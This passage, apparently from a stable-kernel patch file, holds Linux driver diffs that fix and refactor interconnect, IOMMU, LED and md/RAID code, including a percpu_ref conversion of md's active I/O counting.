+ 	/*
+ 	 * Pre sort the BCMs based on VCD for ease of generating a command list
+diff --git a/drivers/interconnect/qcom/qcm2290.c b/drivers/interconnect/qcom/qcm2290.c
+index a29cdb4fac03f..82a2698ad66b1 100644
+--- a/drivers/interconnect/qcom/qcm2290.c
++++ b/drivers/interconnect/qcom/qcm2290.c
+@@ -1355,6 +1355,7 @@ static struct platform_driver qcm2290_noc_driver = {
+ 	.driver = {
+ 		.name = "qnoc-qcm2290",
+ 		.of_match_table = qcm2290_noc_of_match,
++		.sync_state = icc_sync_state,
+ 	},
+ };
+ module_platform_driver(qcm2290_noc_driver);
+diff --git a/drivers/interconnect/qcom/sm8450.c b/drivers/interconnect/qcom/sm8450.c
+index e64c214b40209..d6e582a02e628 100644
+--- a/drivers/interconnect/qcom/sm8450.c
++++ b/drivers/interconnect/qcom/sm8450.c
+@@ -1886,6 +1886,7 @@ static struct platform_driver qnoc_driver = {
+ 	.driver = {
+ 		.name = "qnoc-sm8450",
+ 		.of_match_table = qnoc_of_match,
++		.sync_state = icc_sync_state,
+ 	},
+ };
+ 
+diff --git a/drivers/iommu/amd/iommu_v2.c b/drivers/iommu/amd/iommu_v2.c
+index 75355ddca6575..4caa023048a08 100644
+--- a/drivers/iommu/amd/iommu_v2.c
++++ b/drivers/iommu/amd/iommu_v2.c
+@@ -262,8 +262,8 @@ static void put_pasid_state(struct pasid_state *pasid_state)
+ 
+ static void put_pasid_state_wait(struct pasid_state *pasid_state)
+ {
+-	refcount_dec(&pasid_state->count);
+-	wait_event(pasid_state->wq, !refcount_read(&pasid_state->count));
++	if (!refcount_dec_and_test(&pasid_state->count))
++		wait_event(pasid_state->wq, !refcount_read(&pasid_state->count));
+ 	free_pasid_state(pasid_state);
+ }
+ 
+diff --git a/drivers/iommu/arm/arm-smmu/qcom_iommu.c b/drivers/iommu/arm/arm-smmu/qcom_iommu.c
+index 3869c3ecda8cd..5b9cb9fcc352b 100644
+--- a/drivers/iommu/arm/arm-smmu/qcom_iommu.c
++++ b/drivers/iommu/arm/arm-smmu/qcom_iommu.c
+@@ -273,6 +273,13 @@ static int qcom_iommu_init_domain(struct iommu_domain *domain,
+ 			ctx->secure_init = true;
+ 		}
+ 
++		/* Disable context bank before programming */
++		iommu_writel(ctx, ARM_SMMU_CB_SCTLR, 0);
++
++		/* Clear context bank fault address fault status registers */
++		iommu_writel(ctx, ARM_SMMU_CB_FAR, 0);
++		iommu_writel(ctx, ARM_SMMU_CB_FSR, ARM_SMMU_FSR_FAULT);
++
+ 		/* TTBRs */
+ 		iommu_writeq(ctx, ARM_SMMU_CB_TTBR0,
+ 				pgtbl_cfg.arm_lpae_s1_cfg.ttbr |
+diff --git a/drivers/iommu/intel/pasid.c b/drivers/iommu/intel/pasid.c
+index a39aab66a01b1..3f03039e5cce5 100644
+--- a/drivers/iommu/intel/pasid.c
++++ b/drivers/iommu/intel/pasid.c
+@@ -127,7 +127,7 @@ int intel_pasid_alloc_table(struct device *dev)
+ 	info->pasid_table = pasid_table;
+ 
+ 	if (!ecap_coherent(info->iommu->ecap))
+-		clflush_cache_range(pasid_table->table, size);
++		clflush_cache_range(pasid_table->table, (1 << order) * PAGE_SIZE);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index 2ae5a6058a34a..9673cd60c84fc 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -223,10 +223,9 @@ struct mtk_iommu_data {
+ 	struct device			*smicomm_dev;
+ 
+ 	struct mtk_iommu_bank_data	*bank;
++	struct mtk_iommu_domain		*share_dom; /* For 2 HWs share pgtable */
+ 
+-	struct dma_iommu_mapping	*mapping; /* For mtk_iommu_v1.c */
+ 	struct regmap			*pericfg;
+-
+ 	struct mutex			mutex; /* Protect m4u_group/m4u_dom above */
+ 
+ 	/*
+@@ -577,15 +576,14 @@ static int mtk_iommu_domain_finalise(struct mtk_iommu_domain *dom,
+ 				     struct mtk_iommu_data *data,
+ 				     unsigned int region_id)
+ {
++	struct mtk_iommu_domain	*share_dom = data->share_dom;
+ 	const struct mtk_iommu_iova_region *region;
+-	struct mtk_iommu_domain	*m4u_dom;
+-
+-	/* Always use bank0 in sharing pgtable case */
+-	m4u_dom = data->bank[0].m4u_dom;
+-	if (m4u_dom) {
+-		dom->iop = m4u_dom->iop;
+-		dom->cfg = m4u_dom->cfg;
+-		dom->domain.pgsize_bitmap = m4u_dom->cfg.pgsize_bitmap;
++
++	/* Always use share domain in sharing pgtable case */
++	if (MTK_IOMMU_HAS_FLAG(data->plat_data, SHARE_PGTABLE) && share_dom) {
++		dom->iop = share_dom->iop;
++		dom->cfg = share_dom->cfg;
++		dom->domain.pgsize_bitmap = share_dom->cfg.pgsize_bitmap;
+ 		goto update_iova_region;
+ 	}
+ 
+@@ -615,6 +613,9 @@ static int mtk_iommu_domain_finalise(struct mtk_iommu_domain *dom,
+ 	/* Update our support page sizes bitmap */
+ 	dom->domain.pgsize_bitmap = dom->cfg.pgsize_bitmap;
+ 
++	if (MTK_IOMMU_HAS_FLAG(data->plat_data, SHARE_PGTABLE))
++		data->share_dom = dom;
++
+ update_iova_region:
+ 	/* Update the iova region for this domain */
+ 	region = data->plat_data->iova_region + region_id;
+@@ -665,7 +666,9 @@ static int mtk_iommu_attach_device(struct iommu_domain *domain,
+ 		/* Data is in the frstdata in sharing pgtable case. */
+ 		frstdata = mtk_iommu_get_frst_data(hw_list);
+ 
++		mutex_lock(&frstdata->mutex);
+ 		ret = mtk_iommu_domain_finalise(dom, frstdata, region_id);
++		mutex_unlock(&frstdata->mutex);
+ 		if (ret) {
+ 			mutex_unlock(&dom->mutex);
+ 			return -ENODEV;
+diff --git a/drivers/iommu/rockchip-iommu.c b/drivers/iommu/rockchip-iommu.c
+index f7e9b56be174f..43bb577a26e59 100644
+--- a/drivers/iommu/rockchip-iommu.c
++++ b/drivers/iommu/rockchip-iommu.c
+@@ -98,8 +98,6 @@ struct rk_iommu_ops {
+ 	phys_addr_t (*pt_address)(u32 dte);
+ 	u32 (*mk_dtentries)(dma_addr_t pt_dma);
+ 	u32 (*mk_ptentries)(phys_addr_t page, int prot);
+-	phys_addr_t (*dte_addr_phys)(u32 addr);
+-	u32 (*dma_addr_dte)(dma_addr_t dt_dma);
+ 	u64 dma_bit_mask;
+ };
+ 
+@@ -277,8 +275,8 @@ static u32 rk_mk_pte(phys_addr_t page, int prot)
+ /*
+  * In v2:
+  * 31:12 - Page address bit 31:0
+- *  11:9 - Page address bit 34:32
+- *   8:4 - Page address bit 39:35
++ * 11: 8 - Page address bit 35:32
++ *  7: 4 - Page address bit 39:36
+  *     3 - Security
+  *     2 - Writable
+  *     1 - Readable
+@@ -505,7 +503,7 @@ static int rk_iommu_force_reset(struct rk_iommu *iommu)
+ 
+ 	/*
+ 	 * Check if register DTE_ADDR is working by writing DTE_ADDR_DUMMY
+-	 * and verifying that upper 5 nybbles are read back.
++	 * and verifying that upper 5 (v1) or 7 (v2) nybbles are read back.
+ 	 */
+ 	for (i = 0; i < iommu->num_mmu; i++) {
+ 		dte_addr = rk_ops->pt_address(DTE_ADDR_DUMMY);
+@@ -530,33 +528,6 @@ static int rk_iommu_force_reset(struct rk_iommu *iommu)
+ 	return 0;
+ }
+ 
+-static inline phys_addr_t rk_dte_addr_phys(u32 addr)
+-{
+-	return (phys_addr_t)addr;
+-}
+-
+-static inline u32 rk_dma_addr_dte(dma_addr_t dt_dma)
+-{
+-	return dt_dma;
+-}
+-
+-#define DT_HI_MASK GENMASK_ULL(39, 32)
+-#define DTE_BASE_HI_MASK GENMASK(11, 4)
+-#define DT_SHIFT   28
+-
+-static inline phys_addr_t rk_dte_addr_phys_v2(u32 addr)
+-{
+-	u64 addr64 = addr;
+-	return (phys_addr_t)(addr64 & RK_DTE_PT_ADDRESS_MASK) |
+-	       ((addr64 & DTE_BASE_HI_MASK) << DT_SHIFT);
+-}
+-
+-static inline u32 rk_dma_addr_dte_v2(dma_addr_t dt_dma)
+-{
+-	return (dt_dma & RK_DTE_PT_ADDRESS_MASK) |
+-	       ((dt_dma & DT_HI_MASK) >> DT_SHIFT);
+-}
+-
+ static void log_iova(struct rk_iommu *iommu, int index, dma_addr_t iova)
+ {
+ 	void __iomem *base = iommu->bases[index];
+@@ -576,7 +547,7 @@ static void log_iova(struct rk_iommu *iommu, int index, dma_addr_t iova)
+ 	page_offset = rk_iova_page_offset(iova);
+ 
+ 	mmu_dte_addr = rk_iommu_read(base, RK_MMU_DTE_ADDR);
+-	mmu_dte_addr_phys = rk_ops->dte_addr_phys(mmu_dte_addr);
++	mmu_dte_addr_phys = rk_ops->pt_address(mmu_dte_addr);
+ 
+ 	dte_addr_phys = mmu_dte_addr_phys + (4 * dte_index);
+ 	dte_addr = phys_to_virt(dte_addr_phys);
+@@ -966,7 +937,7 @@ static int rk_iommu_enable(struct rk_iommu *iommu)
+ 
+ 	for (i = 0; i < iommu->num_mmu; i++) {
+ 		rk_iommu_write(iommu->bases[i], RK_MMU_DTE_ADDR,
+-			       rk_ops->dma_addr_dte(rk_domain->dt_dma));
++			       rk_ops->mk_dtentries(rk_domain->dt_dma));
+ 		rk_iommu_base_command(iommu->bases[i], RK_MMU_CMD_ZAP_CACHE);
+ 		rk_iommu_write(iommu->bases[i], RK_MMU_INT_MASK, RK_MMU_IRQ_MASK);
+ 	}
+@@ -1373,8 +1344,6 @@ static struct rk_iommu_ops iommu_data_ops_v1 = {
+ 	.pt_address = &rk_dte_pt_address,
+ 	.mk_dtentries = &rk_mk_dte,
+ 	.mk_ptentries = &rk_mk_pte,
+-	.dte_addr_phys = &rk_dte_addr_phys,
+-	.dma_addr_dte = &rk_dma_addr_dte,
+ 	.dma_bit_mask = DMA_BIT_MASK(32),
+ };
+ 
+@@ -1382,8 +1351,6 @@ static struct rk_iommu_ops iommu_data_ops_v2 = {
+ 	.pt_address = &rk_dte_pt_address_v2,
+ 	.mk_dtentries = &rk_mk_dte_v2,
+ 	.mk_ptentries = &rk_mk_pte_v2,
+-	.dte_addr_phys = &rk_dte_addr_phys_v2,
+-	.dma_addr_dte = &rk_dma_addr_dte_v2,
+ 	.dma_bit_mask = DMA_BIT_MASK(40),
+ };
+ 
+diff --git a/drivers/iommu/sprd-iommu.c b/drivers/iommu/sprd-iommu.c
+index fadd2c907222b..8261066de07d7 100644
+--- a/drivers/iommu/sprd-iommu.c
++++ b/drivers/iommu/sprd-iommu.c
+@@ -147,6 +147,7 @@ static struct iommu_domain *sprd_iommu_domain_alloc(unsigned int domain_type)
+ 
+ 	dom->domain.geometry.aperture_start = 0;
+ 	dom->domain.geometry.aperture_end = SZ_256M - 1;
++	dom->domain.geometry.force_aperture = true;
+ 
+ 	return &dom->domain;
+ }
+diff --git a/drivers/irqchip/irq-loongson-eiointc.c b/drivers/irqchip/irq-loongson-eiointc.c
+index ac04aeaa2d308..3d99b8bdd8ef1 100644
+--- a/drivers/irqchip/irq-loongson-eiointc.c
++++ b/drivers/irqchip/irq-loongson-eiointc.c
+@@ -145,7 +145,7 @@ static int eiointc_router_init(unsigned int cpu)
+ 	int i, bit;
+ 	uint32_t data;
+ 	uint32_t node = cpu_to_eio_node(cpu);
+-	uint32_t index = eiointc_index(node);
++	int index = eiointc_index(node);
+ 
+ 	if (index < 0) {
+ 		pr_err("Error: invalid nodemap!\n");
+diff --git a/drivers/leds/led-class-multicolor.c b/drivers/leds/led-class-multicolor.c
+index e317408583df9..ec62a48116135 100644
+--- a/drivers/leds/led-class-multicolor.c
++++ b/drivers/leds/led-class-multicolor.c
+@@ -6,6 +6,7 @@
+ #include <linux/device.h>
+ #include <linux/init.h>
+ #include <linux/led-class-multicolor.h>
++#include <linux/math.h>
+ #include <linux/module.h>
+ #include <linux/slab.h>
+ #include <linux/uaccess.h>
+@@ -19,9 +20,10 @@ int led_mc_calc_color_components(struct led_classdev_mc *mcled_cdev,
+ 	int i;
+ 
+ 	for (i = 0; i < mcled_cdev->num_colors; i++)
+-		mcled_cdev->subled_info[i].brightness = brightness *
+-					mcled_cdev->subled_info[i].intensity /
+-					led_cdev->max_brightness;
++		mcled_cdev->subled_info[i].brightness =
++			DIV_ROUND_CLOSEST(brightness *
++					  mcled_cdev->subled_info[i].intensity,
++					  led_cdev->max_brightness);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/leds/led-core.c b/drivers/leds/led-core.c
+index 4a97cb7457888..aad8bc44459fe 100644
+--- a/drivers/leds/led-core.c
++++ b/drivers/leds/led-core.c
+@@ -419,15 +419,15 @@ int led_compose_name(struct device *dev, struct led_init_data *init_data,
+ 	struct fwnode_handle *fwnode = init_data->fwnode;
+ 	const char *devicename = init_data->devicename;
+ 
+-	/* We want to label LEDs that can produce full range of colors
+-	 * as RGB, not multicolor */
+-	BUG_ON(props.color == LED_COLOR_ID_MULTI);
+-
+ 	if (!led_classdev_name)
+ 		return -EINVAL;
+ 
+ 	led_parse_fwnode_props(dev, fwnode, &props);
+ 
++	/* We want to label LEDs that can produce full range of colors
++	 * as RGB, not multicolor */
++	BUG_ON(props.color == LED_COLOR_ID_MULTI);
++
+ 	if (props.label) {
+ 		/*
+ 		 * If init_data.devicename is NULL, then it indicates that
+diff --git a/drivers/leds/leds-pwm.c b/drivers/leds/leds-pwm.c
+index 6832180c1c54f..cc892ecd52408 100644
+--- a/drivers/leds/leds-pwm.c
++++ b/drivers/leds/leds-pwm.c
+@@ -146,7 +146,7 @@ static int led_pwm_create_fwnode(struct device *dev, struct led_pwm_priv *priv)
+ 			led.name = to_of_node(fwnode)->name;
+ 
+ 		if (!led.name) {
+-			ret = EINVAL;
++			ret = -EINVAL;
+ 			goto err_child_out;
+ 		}
+ 
+diff --git a/drivers/leds/trigger/ledtrig-tty.c b/drivers/leds/trigger/ledtrig-tty.c
+index f62db7e520b52..8ae0d2d284aff 100644
+--- a/drivers/leds/trigger/ledtrig-tty.c
++++ b/drivers/leds/trigger/ledtrig-tty.c
+@@ -7,6 +7,8 @@
+ #include <linux/tty.h>
+ #include <uapi/linux/serial.h>
+ 
++#define LEDTRIG_TTY_INTERVAL	50
++
+ struct ledtrig_tty_data {
+ 	struct led_classdev *led_cdev;
+ 	struct delayed_work dwork;
+@@ -122,17 +124,19 @@ static void ledtrig_tty_work(struct work_struct *work)
+ 
+ 	if (icount.rx != trigger_data->rx ||
+ 	    icount.tx != trigger_data->tx) {
+-		led_set_brightness_sync(trigger_data->led_cdev, LED_ON);
++		unsigned long interval = LEDTRIG_TTY_INTERVAL;
++
++		led_blink_set_oneshot(trigger_data->led_cdev, &interval,
++				      &interval, 0);
+ 
+ 		trigger_data->rx = icount.rx;
+ 		trigger_data->tx = icount.tx;
+-	} else {
+-		led_set_brightness_sync(trigger_data->led_cdev, LED_OFF);
+ 	}
+ 
+ out:
+ 	mutex_unlock(&trigger_data->mutex);
+-	schedule_delayed_work(&trigger_data->dwork, msecs_to_jiffies(100));
++	schedule_delayed_work(&trigger_data->dwork,
++			      msecs_to_jiffies(LEDTRIG_TTY_INTERVAL * 2));
+ }
+ 
+ static struct attribute *ledtrig_tty_attrs[] = {
+diff --git a/drivers/md/md-bitmap.c b/drivers/md/md-bitmap.c
+index 8bbeeec70905c..5200bba63708e 100644
+--- a/drivers/md/md-bitmap.c
++++ b/drivers/md/md-bitmap.c
+@@ -2481,6 +2481,10 @@ backlog_store(struct mddev *mddev, const char *buf, size_t len)
+ 	if (backlog > COUNTER_MAX)
+ 		return -EINVAL;
+ 
++	rv = mddev_lock(mddev);
++	if (rv)
++		return rv;
++
+ 	/*
+ 	 * Without write mostly device, it doesn't make sense to set
+ 	 * backlog for max_write_behind.
+@@ -2494,6 +2498,7 @@ backlog_store(struct mddev *mddev, const char *buf, size_t len)
+ 	if (!has_write_mostly) {
+ 		pr_warn_ratelimited("%s: can't set backlog, no write mostly device available\n",
+ 				    mdname(mddev));
++		mddev_unlock(mddev);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -2504,13 +2509,13 @@ backlog_store(struct mddev *mddev, const char *buf, size_t len)
+ 			mddev_destroy_serial_pool(mddev, NULL, false);
+ 	} else if (backlog && !mddev->serial_info_pool) {
+ 		/* serial_info_pool is needed since backlog is not zero */
+-		struct md_rdev *rdev;
+-
+ 		rdev_for_each(rdev, mddev)
+ 			mddev_create_serial_pool(mddev, rdev, false);
+ 	}
+ 	if (old_mwb != backlog)
+ 		md_bitmap_update_sb(mddev->bitmap);
++
++	mddev_unlock(mddev);
+ 	return len;
+ }
+ 
+diff --git a/drivers/md/md-linear.c b/drivers/md/md-linear.c
+index 6e7797b4e7381..4eb72b9dd9336 100644
+--- a/drivers/md/md-linear.c
++++ b/drivers/md/md-linear.c
+@@ -223,7 +223,8 @@ static bool linear_make_request(struct mddev *mddev, struct bio *bio)
+ 		     bio_sector < start_sector))
+ 		goto out_of_bounds;
+ 
+-	if (unlikely(is_mddev_broken(tmp_dev->rdev, "linear"))) {
++	if (unlikely(is_rdev_broken(tmp_dev->rdev))) {
++		md_error(mddev, tmp_dev->rdev);
+ 		bio_io_error(bio);
+ 		return true;
+ 	}
+@@ -270,6 +271,16 @@ static void linear_status (struct seq_file *seq, struct mddev *mddev)
+ 	seq_printf(seq, " %dk rounding", mddev->chunk_sectors / 2);
+ }
+ 
++static void linear_error(struct mddev *mddev, struct md_rdev *rdev)
++{
++	if (!test_and_set_bit(MD_BROKEN, &mddev->flags)) {
++		char *md_name = mdname(mddev);
++
++		pr_crit("md/linear%s: Disk failure on %pg detected, failing array.\n",
++			md_name, rdev->bdev);
++	}
++}
++
+ static void linear_quiesce(struct mddev *mddev, int state)
+ {
+ }
+@@ -286,6 +297,7 @@ static struct md_personality linear_personality =
+ 	.hot_add_disk	= linear_add,
+ 	.size		= linear_size,
+ 	.quiesce	= linear_quiesce,
++	.error_handler	= linear_error,
+ };
+ 
+ static int __init linear_init (void)
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 45daba0eb9310..86b2acfba1a7f 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -368,6 +368,10 @@ EXPORT_SYMBOL_GPL(md_new_event);
+ static LIST_HEAD(all_mddevs);
+ static DEFINE_SPINLOCK(all_mddevs_lock);
+ 
++static bool is_md_suspended(struct mddev *mddev)
++{
++	return percpu_ref_is_dying(&mddev->active_io);
++}
+ /* Rather than calling directly into the personality make_request function,
+  * IO requests come here first so that we can check if the device is
+  * being suspended pending a reconfiguration.
+@@ -377,7 +381,7 @@ static DEFINE_SPINLOCK(all_mddevs_lock);
+  */
+ static bool is_suspended(struct mddev *mddev, struct bio *bio)
+ {
+-	if (mddev->suspended)
++	if (is_md_suspended(mddev))
+ 		return true;
+ 	if (bio_data_dir(bio) != WRITE)
+ 		return false;
+@@ -393,12 +397,10 @@ static bool is_suspended(struct mddev *mddev, struct bio *bio)
+ void md_handle_request(struct mddev *mddev, struct bio *bio)
+ {
+ check_suspended:
+-	rcu_read_lock();
+ 	if (is_suspended(mddev, bio)) {
+ 		DEFINE_WAIT(__wait);
+ 		/* Bail out if REQ_NOWAIT is set for the bio */
+ 		if (bio->bi_opf & REQ_NOWAIT) {
+-			rcu_read_unlock();
+ 			bio_wouldblock_error(bio);
+ 			return;
+ 		}
+@@ -407,23 +409,19 @@ check_suspended:
+ 					TASK_UNINTERRUPTIBLE);
+ 			if (!is_suspended(mddev, bio))
+ 				break;
+-			rcu_read_unlock();
+ 			schedule();
+-			rcu_read_lock();
+ 		}
+ 		finish_wait(&mddev->sb_wait, &__wait);
+ 	}
+-	atomic_inc(&mddev->active_io);
+-	rcu_read_unlock();
++	if (!percpu_ref_tryget_live(&mddev->active_io))
++		goto check_suspended;
+ 
+ 	if (!mddev->pers->make_request(mddev, bio)) {
+-		atomic_dec(&mddev->active_io);
+-		wake_up(&mddev->sb_wait);
++		percpu_ref_put(&mddev->active_io);
+ 		goto check_suspended;
+ 	}
+ 
+-	if (atomic_dec_and_test(&mddev->active_io) && mddev->suspended)
+-		wake_up(&mddev->sb_wait);
++	percpu_ref_put(&mddev->active_io);
+ }
+ EXPORT_SYMBOL(md_handle_request);
+ 
+@@ -471,11 +469,10 @@ void mddev_suspend(struct mddev *mddev)
+ 	lockdep_assert_held(&mddev->reconfig_mutex);
+ 	if (mddev->suspended++)
+ 		return;
+-	synchronize_rcu();
+ 	wake_up(&mddev->sb_wait);
+ 	set_bit(MD_ALLOW_SB_UPDATE, &mddev->flags);
+-	smp_mb__after_atomic();
+-	wait_event(mddev->sb_wait, atomic_read(&mddev->active_io) == 0);
++	percpu_ref_kill(&mddev->active_io);
++	wait_event(mddev->sb_wait, percpu_ref_is_zero(&mddev->active_io));
+ 	mddev->pers->quiesce(mddev, 1);
+ 	clear_bit_unlock(MD_ALLOW_SB_UPDATE, &mddev->flags);
+ 	wait_event(mddev->sb_wait, !test_bit(MD_UPDATING_SB, &mddev->flags));
+@@ -488,11 +485,14 @@ EXPORT_SYMBOL_GPL(mddev_suspend);
+ 
+ void mddev_resume(struct mddev *mddev)
+ {
+-	/* entred the memalloc scope from mddev_suspend() */
+-	memalloc_noio_restore(mddev->noio_flag);
+ 	lockdep_assert_held(&mddev->reconfig_mutex);
+ 	if (--mddev->suspended)
+ 		return;
++
++	/* entered the memalloc scope from mddev_suspend() */
++	memalloc_noio_restore(mddev->noio_flag);
++
++	percpu_ref_resurrect(&mddev->active_io);
+ 	wake_up(&mddev->sb_wait);
+ 	mddev->pers->quiesce(mddev, 0);
+ 
+@@ -671,7 +671,6 @@ void mddev_init(struct mddev *mddev)
+ 	timer_setup(&mddev->safemode_timer, md_safemode_timeout, 0);
+ 	atomic_set(&mddev->active, 1);
+ 	atomic_set(&mddev->openers, 0);
+-	atomic_set(&mddev->active_io, 0);
+ 	spin_lock_init(&mddev->lock);
+ 	atomic_set(&mddev->flush_pending, 0);
+ 	init_waitqueue_head(&mddev->sb_wait);
+@@ -5779,6 +5778,12 @@ static void md_safemode_timeout(struct timer_list *t)
+ }
+ 
+ static int start_dirty_degraded;
++static void active_io_release(struct percpu_ref *ref)
++{
++	struct mddev *mddev = container_of(ref, struct mddev, active_io);
++
++	wake_up(&mddev->sb_wait);
++}
+ 
+ int md_run(struct mddev *mddev)
+ {
+@@ -5859,10 +5864,15 @@ int md_run(struct mddev *mddev)
+ 		nowait = nowait && bdev_nowait(rdev->bdev);
+ 	}
+ 
++	err = percpu_ref_init(&mddev->active_io, active_io_release,
++				PERCPU_REF_ALLOW_REINIT, GFP_KERNEL);
++	if (err)
++		return err;
++
+ 	if (!bioset_initialized(&mddev->bio_set)) {
+ 		err = bioset_init(&mddev->bio_set, BIO_POOL_SIZE, 0, BIOSET_NEED_BVECS);
+ 		if (err)
+-			return err;
++			goto exit_active_io;
+ 	}
+ 	if (!bioset_initialized(&mddev->sync_set)) {
+ 		err = bioset_init(&mddev->sync_set, BIO_POOL_SIZE, 0, BIOSET_NEED_BVECS);
+@@ -6050,6 +6060,8 @@ abort:
+ 	bioset_exit(&mddev->sync_set);
+ exit_bio_set:
+ 	bioset_exit(&mddev->bio_set);
++exit_active_io:
++	percpu_ref_exit(&mddev->active_io);
+ 	return err;
+ }
+ EXPORT_SYMBOL_GPL(md_run);
+@@ -6238,7 +6250,7 @@ EXPORT_SYMBOL_GPL(md_stop_writes);
+ static void mddev_detach(struct mddev *mddev)
+ {
+ 	md_bitmap_wait_behind_writes(mddev);
+-	if (mddev->pers && mddev->pers->quiesce && !mddev->suspended) {
++	if (mddev->pers && mddev->pers->quiesce && !is_md_suspended(mddev)) {
+ 		mddev->pers->quiesce(mddev, 1);
+ 		mddev->pers->quiesce(mddev, 0);
+ 	}
+@@ -6265,6 +6277,10 @@ static void __md_stop(struct mddev *mddev)
+ 		mddev->to_remove = &md_redundancy_group;
+ 	module_put(pers->owner);
+ 	clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery);
++
++	percpu_ref_exit(&mddev->active_io);
++	bioset_exit(&mddev->bio_set);
++	bioset_exit(&mddev->sync_set);
+ }
+ 
+ void md_stop(struct mddev *mddev)
+@@ -6276,8 +6292,7 @@ void md_stop(struct mddev *mddev)
+ 	 */
+ 	__md_stop_writes(mddev);
+ 	__md_stop(mddev);
+-	bioset_exit(&mddev->bio_set);
+-	bioset_exit(&mddev->sync_set);
++	percpu_ref_exit(&mddev->writes_pending);
+ }
+ 
+ EXPORT_SYMBOL_GPL(md_stop);
+@@ -7845,9 +7860,6 @@ static void md_free_disk(struct gendisk *disk)
+ 	struct mddev *mddev = disk->private_data;
+ 
+ 	percpu_ref_exit(&mddev->writes_pending);
+-	bioset_exit(&mddev->bio_set);
+-	bioset_exit(&mddev->sync_set);
+-
+ 	mddev_free(mddev);
+ }
+ 
+@@ -7978,6 +7990,9 @@ void md_error(struct mddev *mddev, struct md_rdev *rdev)
+ 		return;
+ 	mddev->pers->error_handler(mddev, rdev);
+ 
++	if (mddev->pers->level == 0 || mddev->pers->level == LEVEL_LINEAR)
++		return;
++
+ 	if (mddev->degraded && !test_bit(MD_BROKEN, &mddev->flags))
+ 		set_bit(MD_RECOVERY_RECOVER, &mddev->recovery);
+ 	sysfs_notify_dirent_safe(rdev->sysfs_state);
+@@ -8548,7 +8563,7 @@ bool md_write_start(struct mddev *mddev, struct bio *bi)
+ 		return true;
+ 	wait_event(mddev->sb_wait,
+ 		   !test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags) ||
+-		   mddev->suspended);
++		   is_md_suspended(mddev));
+ 	if (test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags)) {
+ 		percpu_ref_put(&mddev->writes_pending);
+ 		return false;
+@@ -9276,7 +9291,7 @@ void md_check_recovery(struct mddev *mddev)
+ 		wake_up(&mddev->sb_wait);
+ 	}
+ 
+-	if (mddev->suspended)
++	if (is_md_suspended(mddev))
+ 		return;
+ 
+ 	if (mddev->bitmap)
+diff --git a/drivers/md/md.h b/drivers/md/md.h
+index b4e2d8b87b611..4f0b480974552 100644
+--- a/drivers/md/md.h
++++ b/drivers/md/md.h
+@@ -315,7 +315,7 @@ struct mddev {
+ 	unsigned long			sb_flags;
+ 
+ 	int				suspended;
+-	atomic_t			active_io;
++	struct percpu_ref		active_io;
+ 	int				ro;
+ 	int				sysfs_active; /* set when sysfs deletes
+ 						       * are happening, so run/
+@@ -790,15 +790,9 @@ extern void mddev_destroy_serial_pool(struct mddev *mddev, struct md_rdev *rdev,
+ struct md_rdev *md_find_rdev_nr_rcu(struct mddev *mddev, int nr);
+ struct md_rdev *md_find_rdev_rcu(struct mddev *mddev, dev_t dev);
+ 
+-static inline bool is_mddev_broken(struct md_rdev *rdev, const char *md_type)
++static inline bool is_rdev_broken(struct md_rdev *rdev)
+ {
+-	if (!disk_live(rdev->bdev->bd_disk)) {
+-		if (!test_and_set_bit(MD_BROKEN, &rdev->mddev->flags))
+-			pr_warn("md: %s: %s array has a missing/failed member\n",
+-				mdname(rdev->mddev), md_type);
+-		return true;
+-	}
+-	return false;
++	return !disk_live(rdev->bdev->bd_disk);
+ }
+ 
+ static inline void rdev_dec_pending(struct md_rdev *rdev, struct mddev *mddev)
+diff --git a/drivers/md/raid0.c b/drivers/md/raid0.c
+index 0f7c3b3c62b25..7c6a0b4437d8f 100644
+--- a/drivers/md/raid0.c
++++ b/drivers/md/raid0.c
+@@ -557,14 +557,50 @@ static void raid0_handle_discard(struct mddev *mddev, struct bio *bio)
+ 	bio_endio(bio);
+ }
+ 
+-static bool raid0_make_request(struct mddev *mddev, struct bio *bio)
++static void raid0_map_submit_bio(struct mddev *mddev, struct bio *bio)
+ {
+ 	struct r0conf *conf = mddev->private;
+ 	struct strip_zone *zone;
+ 	struct md_rdev *tmp_dev;
+-	sector_t bio_sector;
++	sector_t bio_sector = bio->bi_iter.bi_sector;
++	sector_t sector = bio_sector;
++
++	md_account_bio(mddev, &bio);
++
++	zone = find_zone(mddev->private, &sector);
++	switch (conf->layout) {
++	case RAID0_ORIG_LAYOUT:
++		tmp_dev = map_sector(mddev, zone, bio_sector, &sector);
++		break;
++	case RAID0_ALT_MULTIZONE_LAYOUT:
++		tmp_dev = map_sector(mddev, zone, sector, &sector);
++		break;
++	default:
++		WARN(1, "md/raid0:%s: Invalid layout\n", mdname(mddev));
++		bio_io_error(bio);
++		return;
++	}
++
++	if (unlikely(is_rdev_broken(tmp_dev))) {
++		bio_io_error(bio);
++		md_error(mddev, tmp_dev);
++		return;
++	}
++
++	bio_set_dev(bio, tmp_dev->bdev);
++	bio->bi_iter.bi_sector = sector + zone->dev_start +
++		tmp_dev->data_offset;
++
++	if (mddev->gendisk)
++		trace_block_bio_remap(bio, disk_devt(mddev->gendisk),
++				      bio_sector);
++	mddev_check_write_zeroes(mddev, bio);
++	submit_bio_noacct(bio);
++}
++
++static bool raid0_make_request(struct mddev *mddev, struct bio *bio)
++{
+ 	sector_t sector;
+-	sector_t orig_sector;
+ 	unsigned chunk_sects;
+ 	unsigned sectors;
+ 
+@@ -577,8 +613,7 @@ static bool raid0_make_request(struct mddev *mddev, struct bio *bio)
+ 		return true;
+ 	}
+ 
+-	bio_sector = bio->bi_iter.bi_sector;
+-	sector = bio_sector;
++	sector = bio->bi_iter.bi_sector;
+ 	chunk_sects = mddev->chunk_sectors;
+ 
+ 	sectors = chunk_sects -
+@@ -586,49 +621,15 @@ static bool raid0_make_request(struct mddev *mddev, struct bio *bio)
+ 		 ? (sector & (chunk_sects-1))
+ 		 : sector_div(sector, chunk_sects));
+ 
+-	/* Restore due to sector_div */
+-	sector = bio_sector;
+-
+ 	if (sectors < bio_sectors(bio)) {
+ 		struct bio *split = bio_split(bio, sectors, GFP_NOIO,
